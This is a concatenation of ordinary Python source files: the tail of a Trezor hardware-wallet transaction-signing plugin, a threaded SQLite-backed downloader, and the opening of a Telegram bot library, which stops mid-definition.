client.handler = wizard
xpub = client.get_xpub(derivation)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = b58_address_to_hash160(address)
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
downloader.py
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @author: XYZ
# @file: downloader.py
# @time: 2021.02.23 16:27
# @desc:
import os
import pickle
import sqlite3
import threading
from multiprocessing import JoinableQueue
from nspider.core.log import Log
import nspider.utilities.constant as const
from nspider.core.tps_bucket import TPSBucket
import nspider.utilities.common as common
class Downloader(object):
def __init__(self, tps, thread_num):
self.tps = tps
self.thread_num = thread_num
self.tps_bucket = TPSBucket(expected_tps=self.tps)
self.tps_bucket.start()
self.resource_queue = JoinableQueue(self.thread_num*2)
self.workers = []
def start(self, parser, clear_cache=False):
self.log = Log(parser.name() + ".download.log")
self.parser_db_path = os.path.join(const.CACHE_DIR, parser.name() + ".db")
self.db_path = os.path.join(const.CACHE_DIR, parser.name() + ".download.db")
if clear_cache:
try:
os.remove(self.db_path)
except Exception as err:
self.log.logger.exception(err)
self.conn = sqlite3.connect(self.db_path, check_same_thread=False, isolation_level=None)
self.conn_p = sqlite3.connect(self.parser_db_path, check_same_thread=False, isolation_level=None)
self.__init_db()
self.__init_fetcher()
self.__init_workers()
self.__wait()
self.log.logger.info("Exit")
def __init_workers(self):
for i in range(self.thread_num):
worker = threading.Thread(target=self.__worker_process, args=(str(i),))
worker.setDaemon(True)
self.workers.append(worker)
for worker in self.workers:
worker.start()
def __init_fetcher(self):
self.fetcher = threading.Thread(target=self.__fetcher_process)
self.fetcher.setDaemon(True)
self.fetcher.start()
def __wait(self):
self.fetcher.join()
def __init_db(self):
c = self.conn.cursor()
c.execute('pragma journal_mode=wal;')
create_resource_done_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} TEXT)".format(
const.RESOURCE_DONE_TABLE, const.COLUMN_NAME_FINGERPRINT)
create_resource_failed_table = "CREATE TABLE if not exists {} (id INTEGER PRIMARY KEY, {} TEXT, {} BLOB)".format(
const.RESOURCE_FAILED_TABLE, const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_RESOURCE)
for t in [create_resource_done_table, create_resource_failed_table]:
c.execute(t)
def __fetcher_process(self):
c = self.conn.cursor()
c_p = self.conn_p.cursor()
resources = c_p.execute("SELECT * FROM {}".format(const.PARSER_RESOURCE_TABLE))
for resource in resources:
c.execute("SELECT {} FROM {} WHERE id=? AND fingerprint=?".format(const.COLUMN_NAME_FINGERPRINT,
const.RESOURCE_DONE_TABLE),
(resource[0], resource[1],))
if not c.fetchone():
self.resource_queue.put((resource[0], pickle.loads(resource[2])))
self.log.logger.info("Fetcher put all resources in the queue, now waiting for workers finish jobs")
self.resource_queue.join()
def before_download(self, resource):
return resource
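# Illustrative sketch (not part of the original source): before_download() is a hook
# that subclasses may override to adjust a resource just before it is downloaded; it
# must return the (possibly modified) resource. The header value below is hypothetical;
# the 'headers' attribute mirrors what download() already passes to common.download().
#
#   class MyDownloader(Downloader):
#       def before_download(self, resource):
#           resource.headers = {'User-Agent': 'nspider'}
#           return resource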
def __worker_process(self, name):
self.log.logger.info("Worker {} start to work".format(name))
c = self.conn.cursor()
while True:
(id_, resource) = self.resource_queue.get()
while True:
if self.tps_bucket.get_token():
break
resource = self.before_download(resource)
if not resource:
raise Exception("before_download() must return a resource object")
self.log.logger.info("Worker {} trying downloading {}".format(name, resource.url))
res = self.download(resource)
if res:
c.execute("INSERT OR IGNORE INTO {}(id, {}) VALUES (?, ?)".format(const.RESOURCE_DONE_TABLE,
const.COLUMN_NAME_FINGERPRINT),
(id_, resource.fingerprint,))
if resource.callback:
resource.callback()
else:
c.execute("INSERT OR IGNORE INTO {}(id, {}, {}) VALUES (?, ?, ?)".format(const.RESOURCE_FAILED_TABLE,
const.COLUMN_NAME_FINGERPRINT, const.COLUMN_NAME_RESOURCE),
(id_, resource.fingerprint, pickle.dumps(resource)))
if resource.errback:
resource.errback()
self.resource_queue.task_done()
def download(self, resource):
return common.download(resource.url, filename=resource.filename, save_dir=resource.save_dir, stream=resource.stream,
verbose=resource.verbose, try_num=resource.try_num, fix_type=resource.fix_type, cookies=resource.cookies,
headers=resource.headers, params=resource.params, data=resource.data, session=resource.session, proxies=resource.proxies,
log=self.log.logger.info,
log_exception=self.log.logger.exception)
|
__init__.py
|
import bisect
import collections
import inspect
import io
import json
import queue
import threading
import time
import logging
import traceback
from typing import Union
from . import exception
__version__ = '2.0.1'
def flavor(msg):
"""
Return flavor of message or event.
A message's flavor may be one of these:
- ``chat``
- ``callback_query``
- ``inline_query``
- ``chosen_inline_result``
- ``shipping_query``
- ``pre_checkout_query``
An event's flavor is determined by the single top-level key.
"""
if 'message_id' in msg:
return 'chat'
if 'id' in msg and 'chat_instance' in msg:
return 'callback_query'
if 'id' in msg and 'query' in msg:
return 'inline_query'
if 'result_id' in msg:
return 'chosen_inline_result'
if 'id' in msg and 'shipping_address' in msg:
return 'shipping_query'
if 'id' in msg and 'total_amount' in msg:
return 'pre_checkout_query'
top_keys = list(msg.keys())
if len(top_keys) == 1:
return top_keys[0]
raise exception.BadFlavor(msg)
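# Illustrative sketch (not part of the original source): how flavor() classifies a few
# minimal update payloads. Field values are hypothetical.
#
#   flavor({'message_id': 1, 'chat': {'id': 42, 'type': 'private'}})   # -> 'chat'
#   flavor({'id': '7', 'chat_instance': 'abc', 'data': 'x'})           # -> 'callback_query'
#   flavor({'id': '8', 'query': 'hello', 'from': {'id': 42}})          # -> 'inline_query'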
chat_flavors = ['chat']
inline_flavors = ['inline_query', 'chosen_inline_result']
def _find_first_key(d, keys):
for k in keys:
if k in d:
return k
logging.error('No suggested keys %s in %s' % (str(keys), str(d)))
# Gets the first key after the update_id one.
return list(d.keys())[1]
all_content_types = [
'text', 'audio', 'animation', 'document', 'game', 'photo', 'sticker', 'video', 'voice',
'video_note', 'contact', 'poll', 'location', 'venue', 'new_chat_member', 'left_chat_member',
'new_chat_title', 'new_chat_photo', 'delete_chat_photo', 'group_chat_created', 'supergroup_chat_created',
'channel_chat_created', 'migrate_to_chat_id', 'migrate_from_chat_id', 'pinned_message',
'new_chat_members', 'invoice', 'successful_payment'
]
def glance(msg, flavor='chat', long=False):
"""
Extract "headline" info about a message.
Use parameter ``long`` to control whether a short or long tuple is returned.
When ``flavor`` is ``chat``
(``msg`` being a `Message <https://core.telegram.org/bots/api#message>`_ object):
- short: (content_type, ``msg['chat']['type']``, ``msg['chat']['id']``)
- long: (content_type, ``msg['chat']['type']``, ``msg['chat']['id']``, ``msg['date']``, ``msg['message_id']``)
*content_type* can be: ``text``, ``audio``, ``document``, ``game``, ``photo``, ``sticker``, ``video``, ``voice``,
``video_note``, ``contact``, ``location``, ``venue``, ``new_chat_member``, ``left_chat_member``, ``new_chat_title``,
``new_chat_photo``, ``delete_chat_photo``, ``group_chat_created``, ``supergroup_chat_created``,
``channel_chat_created``, ``migrate_to_chat_id``, ``migrate_from_chat_id``, ``pinned_message``,
``new_chat_members``, ``invoice``, ``successful_payment``.
When ``flavor`` is ``callback_query``
(``msg`` being a `CallbackQuery <https://core.telegram.org/bots/api#callbackquery>`_ object):
- regardless: (``msg['id']``, ``msg['from']['id']``, ``msg['data']``)
When ``flavor`` is ``inline_query``
(``msg`` being a `InlineQuery <https://core.telegram.org/bots/api#inlinequery>`_ object):
- short: (``msg['id']``, ``msg['from']['id']``, ``msg['query']``)
- long: (``msg['id']``, ``msg['from']['id']``, ``msg['query']``, ``msg['offset']``)
When ``flavor`` is ``chosen_inline_result``
(``msg`` being a `ChosenInlineResult <https://core.telegram.org/bots/api#choseninlineresult>`_ object):
- regardless: (``msg['result_id']``, ``msg['from']['id']``, ``msg['query']``)
When ``flavor`` is ``shipping_query``
(``msg`` being a `ShippingQuery <https://core.telegram.org/bots/api#shippingquery>`_ object):
- regardless: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``)
When ``flavor`` is ``pre_checkout_query``
(``msg`` being a `PreCheckoutQuery <https://core.telegram.org/bots/api#precheckoutquery>`_ object):
- short: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``)
- long: (``msg['id']``, ``msg['from']['id']``, ``msg['invoice_payload']``, ``msg['currency']``, ``msg['total_amount']``)
"""
def gl_chat():
content_type = _find_first_key(msg, all_content_types)
if long:
return content_type, msg['chat']['type'], msg['chat']['id'], msg['date'], msg['message_id']
return content_type, msg['chat']['type'], msg['chat']['id']
def gl_callback_query():
return msg['id'], msg['from']['id'], msg['data']
def gl_inline_query():
if long:
return msg['id'], msg['from']['id'], msg['query'], msg['offset']
return msg['id'], msg['from']['id'], msg['query']
def gl_chosen_inline_result():
return msg['result_id'], msg['from']['id'], msg['query']
def gl_shipping_query():
return msg['id'], msg['from']['id'], msg['invoice_payload']
def gl_pre_checkout_query():
if long:
return msg['id'], msg['from']['id'], msg['invoice_payload'], msg['currency'], msg['total_amount']
return msg['id'], msg['from']['id'], msg['invoice_payload']
try:
fn = {'chat': gl_chat,
'callback_query': gl_callback_query,
'inline_query': gl_inline_query,
'chosen_inline_result': gl_chosen_inline_result,
'shipping_query': gl_shipping_query,
'pre_checkout_query': gl_pre_checkout_query}[flavor]
except KeyError:
raise exception.BadFlavor(flavor)
return fn()
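# Illustrative sketch (not part of the original source): glance() on a minimal chat
# message. Values are hypothetical; the tuple shapes follow the docstring above.
#
#   msg = {'message_id': 10, 'date': 1600000000, 'text': 'hi',
#          'chat': {'id': 42, 'type': 'private'}}
#   glance(msg)             # -> ('text', 'private', 42)
#   glance(msg, long=True)  # -> ('text', 'private', 42, 1600000000, 10)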
def flance(msg, long=False):
"""
A combination of :meth:`amanobot.flavor` and :meth:`amanobot.glance`,
return a 2-tuple (flavor, headline_info), where *headline_info* is whatever extracted by
:meth:`amanobot.glance` depending on the message flavor and the ``long`` parameter.
"""
f = flavor(msg)
g = glance(msg, flavor=f, long=long)
return f, g
def peel(event):
"""
Remove an event's top-level skin (where its flavor is determined), and return
the core content.
"""
return list(event.values())[0]
def fleece(event):
"""
A combination of :meth:`amanobot.flavor` and :meth:`amanobot.peel`,
return a 2-tuple (flavor, content) of an event.
"""
return flavor(event), peel(event)
def is_event(msg):
"""
Return whether the message looks like an event. That is, whether it has a flavor
that starts with an underscore.
"""
return flavor(msg).startswith('_')
def origin_identifier(msg):
"""
Extract the message identifier of a callback query's origin. Returned value
is guaranteed to be a tuple.
``msg`` is expected to be ``callback_query``.
"""
if 'message' in msg:
return msg['message']['chat']['id'], msg['message']['message_id']
if 'inline_message_id' in msg:
return msg['inline_message_id'],
raise ValueError()
def message_identifier(msg):
"""
Extract an identifier for message editing. Useful with :meth:`amanobot.Bot.editMessageText`
and similar methods. Returned value is guaranteed to be a tuple.
``msg`` is expected to be ``chat`` or ``chosen_inline_result``.
"""
if 'chat' in msg and 'message_id' in msg:
return msg['chat']['id'], msg['message_id']
if 'inline_message_id' in msg:
return msg['inline_message_id'],
raise ValueError()
def _dismantle_message_identifier(f):
if isinstance(f, tuple):
if len(f) == 2:
return {'chat_id': f[0], 'message_id': f[1]}
if len(f) == 1:
return {'inline_message_id': f[0]}
raise ValueError()
else:
return {'inline_message_id': f}
def _split_input_media_array(media_array):
def ensure_dict(input_media):
if isinstance(input_media, tuple) and hasattr(input_media, '_asdict'):
return input_media._asdict()
if isinstance(input_media, dict):
return input_media
raise ValueError()
def given_attach_name(input_media):
if isinstance(input_media['media'], tuple):
return input_media['media'][0]
return None
def attach_name_generator(used_names):
x = 0
while 1:
x += 1
name = 'media' + str(x)
if name in used_names:
continue
yield name
def split_media(input_media, name_generator):
file_spec = input_media['media']
# file_id, URL
if _isstring(file_spec):
return input_media, None
# file-object
# (attach-name, file-object)
# (attach-name, (filename, file-object))
if isinstance(file_spec, tuple):
name, f = file_spec
else:
name, f = next(name_generator), file_spec
m = input_media.copy()
m['media'] = 'attach://' + name
return (m, (name, f))
ms = [ensure_dict(m) for m in media_array]
used_names = [given_attach_name(m) for m in ms if given_attach_name(m) is not None]
name_generator = attach_name_generator(used_names)
splitted = [split_media(m, name_generator) for m in ms]
legal_media, attachments = map(list, zip(*splitted))
files_to_attach = dict([a for a in attachments if a is not None])
return legal_media, files_to_attach
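# Illustrative sketch (not part of the original source): how a mixed media array is
# split into JSON-safe InputMedia dicts plus files to attach. 'photo.jpg' and the
# file_id value are hypothetical.
#
#   media = [{'type': 'photo', 'media': 'AgADBAAD...file_id'},        # string: kept as-is
#            {'type': 'photo', 'media': open('photo.jpg', 'rb')}]     # file: becomes attach://media1
#   legal_media, files_to_attach = _split_input_media_array(media)
#   # legal_media[1]['media'] == 'attach://media1'
#   # files_to_attach == {'media1': <open file object>}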
def _isstring(s):
return isinstance(s, str)
def _isfile(f):
return isinstance(f, io.IOBase)
from . import helper
def flavor_router(routing_table):
router = helper.Router(flavor, routing_table)
return router.route
class _BotBase:
def __init__(self, token: str, raise_errors: bool, api_endpoint: str):
self._token = token
self._raise_errors = raise_errors
self._base_url = api_endpoint
self._file_chunk_size = 65536
def _strip(params, more=[]):
return {key: value for key, value in params.items() if key not in ['self'] + more}
def _rectify(params):
def make_jsonable(value):
if isinstance(value, list):
return [make_jsonable(v) for v in value]
if isinstance(value, dict):
return {k: make_jsonable(v) for k, v in value.items() if v is not None}
if isinstance(value, tuple) and hasattr(value, '_asdict'):
return {k: make_jsonable(v) for k, v in value._asdict().items() if v is not None}
return value
def flatten(value):
v = make_jsonable(value)
if isinstance(v, (dict, list)):
return json.dumps(v, separators=(',', ':'))
return v
# remove None, then json-serialize if needed
return {k: flatten(v) for k, v in params.items() if v is not None}
from . import api
class Bot(_BotBase):
class Scheduler(threading.Thread):
# Events compare by timestamp so the `bisect` module can keep the event queue ordered.
Event = collections.namedtuple('Event', ['timestamp', 'data'])
Event.__eq__ = lambda self, other: self.timestamp == other.timestamp
Event.__ne__ = lambda self, other: self.timestamp != other.timestamp
Event.__gt__ = lambda self, other: self.timestamp > other.timestamp
Event.__ge__ = lambda self, other: self.timestamp >= other.timestamp
Event.__lt__ = lambda self, other: self.timestamp < other.timestamp
Event.__le__ = lambda self, other: self.timestamp <= other.timestamp
def __init__(self):
super(Bot.Scheduler, self).__init__()
self._eventq = []
self._lock = threading.RLock() # reentrant lock to allow locked method calling locked method
self._event_handler = None
def _locked(fn):
def k(self, *args, **kwargs):
with self._lock:
return fn(self, *args, **kwargs)
return k
@_locked
def _insert_event(self, data, when):
ev = self.Event(when, data)
bisect.insort(self._eventq, ev)
return ev
@_locked
def _remove_event(self, event):
# Locate the event by its timestamp.
# bisect() returns the index just past any equal timestamps.
i = bisect.bisect(self._eventq, event)
# Two events with identical timestamps are unlikely but possible, so scan
# backwards and compare both timestamp AND object identity to make sure
# the correct object is removed.
while i > 0:
i -= 1
e = self._eventq[i]
if e.timestamp != event.timestamp:
raise exception.EventNotFound(event)
elif id(e) == id(event):
self._eventq.pop(i)
return
raise exception.EventNotFound(event)
@_locked
def _pop_expired_event(self):
if not self._eventq:
return None
if self._eventq[0].timestamp <= time.time():
return self._eventq.pop(0)
return None
def event_at(self, when, data):
"""
Schedule some data to emit at an absolute timestamp.
:type when: int or float
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, when)
def event_later(self, delay, data):
"""
Schedule some data to emit after a number of seconds.
:type delay: int or float
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, time.time() + delay)
def event_now(self, data):
"""
Emit some data as soon as possible.
:type data: dictionary
:return: an internal Event object
"""
return self._insert_event(data, time.time())
def cancel(self, event):
"""
Cancel an event.
:type event: an internal Event object
"""
self._remove_event(event)
def run(self):
while 1:
e = self._pop_expired_event()
while e:
if callable(e.data):
d = e.data() # call the data-producing function
if d is not None:
self._event_handler(d)
else:
self._event_handler(e.data)
e = self._pop_expired_event()
time.sleep(0.1)
def run_as_thread(self):
self.daemon = True
self.start()
def on_event(self, fn):
self._event_handler = fn
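# Illustrative sketch (not part of the original source): using the scheduler exposed by
# a Bot instance. The token, handler, and event payload are hypothetical; events whose
# single top-level key starts with an underscore follow the event convention above.
#
#   bot = Bot('TOKEN')
#   bot.scheduler.on_event(lambda data: print('emitted:', data))
#   bot.scheduler.run_as_thread()
#   ev = bot.scheduler.event_later(5, {'_my_event': {'value': 1}})  # fires in ~5 seconds
#   bot.scheduler.cancel(ev)                                        # or cancel before it fires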
def __init__(self, token: str, raise_errors: bool = True, api_endpoint: str = "https://api.telegram.org"):
super(Bot, self).__init__(token, raise_errors, api_endpoint)
self._scheduler = self.Scheduler()
self._router = helper.Router(flavor, {'chat': lambda msg: self.on_chat_message(msg),
'callback_query': lambda msg: self.on_callback_query(msg),
'inline_query': lambda msg: self.on_inline_query(msg),
'chosen_inline_result': lambda msg: self.on_chosen_inline_result(msg)})
# use lambda to delay evaluation of self.on_ZZZ to runtime because
# I don't want to require defining all methods right here.
@property
def scheduler(self):
return self._scheduler
@property
def router(self):
return self._router
def handle(self, msg):
self._router.route(msg)
def _api_request(self, method, params=None, files=None, raise_errors=None, **kwargs):
return api.request((self._base_url, self._token, method, params, files),
raise_errors=raise_errors if raise_errors is not None else self._raise_errors, **kwargs)
def _api_request_with_file(self, method, params, files, **kwargs):
params.update({
k: v for k, v in files.items() if _isstring(v)})
files = {
k: v for k, v in files.items() if v is not None and not _isstring(v)}
return self._api_request(method, _rectify(params), files, **kwargs)
def getMe(self):
""" See: https://core.telegram.org/bots/api#getme """
return self._api_request('getMe')
def logOut(self):
""" See: https://core.telegram.org/bots/api#logout """
return self._api_request('logOut')
def close(self):
""" See: https://core.telegram.org/bots/api#close """
return self._api_request('close')
def sendMessage(self, chat_id: Union[int, str], text: str,
parse_mode: str = None,
entities=None,
disable_web_page_preview: bool = None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendmessage """
p = _strip(locals())
return self._api_request('sendMessage', _rectify(p))
def forwardMessage(self, chat_id: Union[int, str], from_chat_id: Union[int, str], message_id: int,
disable_notification: bool = None):
""" See: https://core.telegram.org/bots/api#forwardmessage """
p = _strip(locals())
return self._api_request('forwardMessage', _rectify(p))
def copyMessage(self, chat_id: Union[int, str], from_chat_id: Union[int, str], message_id: int,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#copymessage """
p = _strip(locals())
return self._api_request('copyMessage', _rectify(p))
def sendPhoto(self, chat_id: Union[int, str], photo,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendphoto
:param photo:
- string: ``file_id`` for a photo existing on Telegram servers
- string: HTTP URL of a photo from the Internet
- file-like object: obtained by ``open(path, 'rb')``
- tuple: (filename, file-like object).
"""
p = _strip(locals(), more=['photo'])
return self._api_request_with_file('sendPhoto', _rectify(p), {'photo': photo})
def sendAudio(self, chat_id: Union[int, str], audio,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
duration=None,
performer=None,
title=None,
thumb=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendaudio
:param audio: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['audio', 'thumb'])
return self._api_request_with_file('sendAudio', _rectify(p), {'audio': audio, 'thumb': thumb})
def sendDocument(self, chat_id: Union[int, str], document,
thumb=None,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
disable_content_type_detection=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#senddocument
:param document: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['document', 'thumb'])
return self._api_request_with_file('sendDocument', _rectify(p), {'document': document, 'thumb': thumb})
def sendVideo(self, chat_id: Union[int, str], video,
duration=None,
width=None,
height=None,
thumb=None,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
supports_streaming=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvideo
:param video: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['video', 'thumb'])
return self._api_request_with_file('sendVideo', _rectify(p), {'video': video, 'thumb': thumb})
def sendAnimation(self, chat_id: Union[int, str], animation,
duration=None,
width=None,
height=None,
thumb=None,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendanimation
:param animation: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['animation', 'thumb'])
return self._api_request_with_file('sendAnimation', _rectify(p), {'animation': animation, 'thumb': thumb})
def sendVoice(self, chat_id: Union[int, str], voice,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
duration=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvoice
:param voice: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['voice'])
return self._api_request_with_file('sendVoice', _rectify(p), {'voice': voice})
def sendVideoNote(self, chat_id: Union[int, str], video_note,
duration=None,
length=None,
thumb=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvideonote
:param video_note: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
:param length:
Although marked as optional, this method does not seem to work without
it being specified. Supply any integer you want. It seems to have no effect
on the video note's display size.
"""
p = _strip(locals(), more=['video_note', 'thumb'])
return self._api_request_with_file('sendVideoNote', _rectify(p), {'video_note': video_note, 'thumb': thumb})
def sendMediaGroup(self, chat_id: Union[int, str], media,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None):
"""
See: https://core.telegram.org/bots/api#sendmediagroup
:type media: array of `InputMedia <https://core.telegram.org/bots/api#inputmedia>`_ objects
:param media:
To indicate media locations, each InputMedia object's ``media`` field
should be one of these:
- string: ``file_id`` for a file existing on Telegram servers
- string: HTTP URL of a file from the Internet
- file-like object: obtained by ``open(path, 'rb')``
- tuple: (form-data name, file-like object)
- tuple: (form-data name, (filename, file-like object))
In case of uploading, you may supply customized multipart/form-data
names for each uploaded file (as in last 2 options above). Otherwise,
amanobot assigns unique names to each uploaded file. Names assigned by
amanobot will not collide with user-supplied names, if any.
"""
p = _strip(locals(), more=['media'])
legal_media, files_to_attach = _split_input_media_array(media)
p['media'] = legal_media
return self._api_request('sendMediaGroup', _rectify(p), files_to_attach)
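# Illustrative sketch (not part of the original source): sending an album that mixes an
# existing file_id with a freshly uploaded file, following the forms documented above.
# The chat_id, file_id, and filename are hypothetical.
#
#   bot.sendMediaGroup(chat_id, [
#       {'type': 'photo', 'media': 'AgADBAAD...file_id'},
#       {'type': 'photo', 'media': open('photo.jpg', 'rb'), 'caption': 'uploaded'},
#   ])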
def sendLocation(self, chat_id: Union[int, str], latitude, longitude,
horizontal_accuracy=None,
live_period=None,
heading=None,
proximity_alert_radius=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendlocation """
p = _strip(locals())
return self._api_request('sendLocation', _rectify(p))
def editMessageLiveLocation(self, msg_identifier, latitude, longitude,
horizontal_accuracy=None,
heading=None,
proximity_alert_radius=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagelivelocation
:param msg_identifier: Same as in :meth:`.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageLiveLocation', _rectify(p))
def stopMessageLiveLocation(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#stopmessagelivelocation
:param msg_identifier: Same as in :meth:`.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('stopMessageLiveLocation', _rectify(p))
def sendVenue(self, chat_id: Union[int, str], latitude, longitude, title, address,
foursquare_id=None,
foursquare_type=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendvenue """
p = _strip(locals())
return self._api_request('sendVenue', _rectify(p))
def sendContact(self, chat_id: Union[int, str], phone_number, first_name,
last_name=None,
vcard=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendcontact """
p = _strip(locals())
return self._api_request('sendContact', _rectify(p))
def sendPoll(self, chat_id: Union[int, str], question, options,
